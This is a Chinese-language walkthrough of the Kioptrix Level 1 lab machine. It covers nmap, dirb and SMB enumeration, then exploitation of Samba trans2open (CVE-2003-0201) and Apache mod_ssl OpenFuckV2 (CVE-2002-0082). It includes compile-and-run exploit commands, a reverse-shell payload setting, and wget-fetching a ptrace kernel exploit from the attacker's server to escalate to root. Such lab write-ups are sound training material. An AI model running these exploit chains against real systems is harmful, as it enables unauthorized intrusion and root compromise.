0x01 - Kioptrix Level 1 古老的 Apache Vuln

靶场列表
Fetching Title#jll6

扫描主机

nmap 192.168.1.1/24 -sn --min-rate 2222 -R

-sn: 不执行端口扫描。是一种 ping 扫描，只会尝试确定目标主机是否在线。
--min-rate: 设置每秒发送的数据包的最小速率，设置为每秒 2222 个数据包。
-R: 启用反向DNS查找。它将尝试查找目标IP地址的域名

端口探测

nmap 192.168.1.129 -p- --min-rate 9999 -sS -PN -oA nmap_results/nmap_port

-PN: Nmap将禁用主机发现，即使目标主机不响应ping请求，Nmap仍会尝试对其进行端口扫描

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm

对端口指纹探测

# 整合端口
cat nmap_port.nmap | grep open | awk -F '/' '{print $1}' | tr '\n' ','
# 22,80,111,139,443,1024,

nmap 192.168.1.129 -p 22,80,111,139,443,1024 -sV -sC -O --version-all -oA nmap_results/server_info

-sC: 启用默认脚本扫描
-O: 启用操作系统检测
--version-all: 尝试获取所有服务的版本信息，而不仅仅是开放的服务。

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 b8746cdbfd8be666e92a2bdf5e6f6486 (RSA1)
|   1024 8f8e5b81ed21abc180e157a33c85c471 (DSA)
|_  1024 ed4ea94a0614ff1514ceda3a80dbe281 (RSA)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-11-22T04:20:04+00:00; +1h01m51s from scanner time.
|_http-title: 400 Bad Request
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:9A:80:72 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1h01m50s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

网站目录扫描

dirb http://192.168.1.129

==> DIRECTORY: http://192.168.1.129/manual/             
==> DIRECTORY: http://192.168.1.129/mrtg/
==> DIRECTORY: http://192.168.1.129/usage/

漏洞搜索

searchsploit Apache httpd 1.3

PORT 139 SMB（enum4linux、smbclient）

enum4linux枚举，smbclient

enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息

enum4linux 192.168.1.129
# 发现有两个共享用户

smbclient --no-pass //192.168.1.129
smbclient --no-pass //192.168.1.129/IPC$
smbclient --no-pass //192.168.1.129/ADMIN$
smbclient "\\\\192.168.1.129\\IPC$"

# 探测到了共享：ADMIN$ ，可匿名登录但拒绝访问文件

SMB版本探测

服务枚举未探测扫samba的版本，使用MSF的smb_version模块探测版本信息。

msf6> search smb_version
msf6> use auxiliary/scanner/smb/smb_version
msf6> set rhosts 192.168.1.129
msf6> options
msf6> run

Unix (Samba 2.2.1a)

（CVE-2003-0201）Samba RCE

尝试Samba远程代码执行Samba < 2.2.8 （Linux/BSD）- Remote Code Excution

searchsploit samba 2.2
searchsploit samba -m 10

gcc 10.c -o ./shellasroot
./shellasroot -b 0 -v 192.168.1.129

成功拿到root

（CVE-2003-0201）Samba trans2open溢出

Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)

需要使用 MSF exploit/linux/samba/trans2open模块，设置 payload linux/x86/shell_reverse_tcp

（CVE-2002-0082）Apache SSL远程缓冲溢出

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Over

下载exp

searchsploit Apache 1.3 -m 47080

编译脚本

gcc 47080.c -o ssl_mod -lcrypto

如果编译的时候报openssl/ssl.h: No such fail

apt-get install libssl-dev

./ssl_mod 0x6b 192.168.1.129 443 -c 40

成功拿到shell，但不是root

cat /proc/version

Linux version 2.4.7-10 (bhcompile@stripples.devel.redhat.com) (gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-98)) #1 Thu Sep 6 16:46:36 EDT 2001

发现获得apache权限时，会自动下载ptrace-kmod.c后gcc编译，提示没有找到文件。

kali中下载 ptrace-kmod.c到本地，查看注释是内核漏洞提权。

searchsploit ptrace

Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege  | linux/local/3.c

使用python开启http服务将文件摆渡到靶机/tmp下，再次重新执行./47080

//kali
python3 -m http.server --bind 0.0.0.0 9000

//靶机 apache权限
cd /tmp
wget http://192.168.1.128:9000/ptrace-kmod.c
gcc -o exploit ptrace-kmod.c -B /usr/bin
chmod +x exploit
# 一定要运行，我不知道为什么退出了就不可以，所以一定要在靶机里运行脚本
./exploit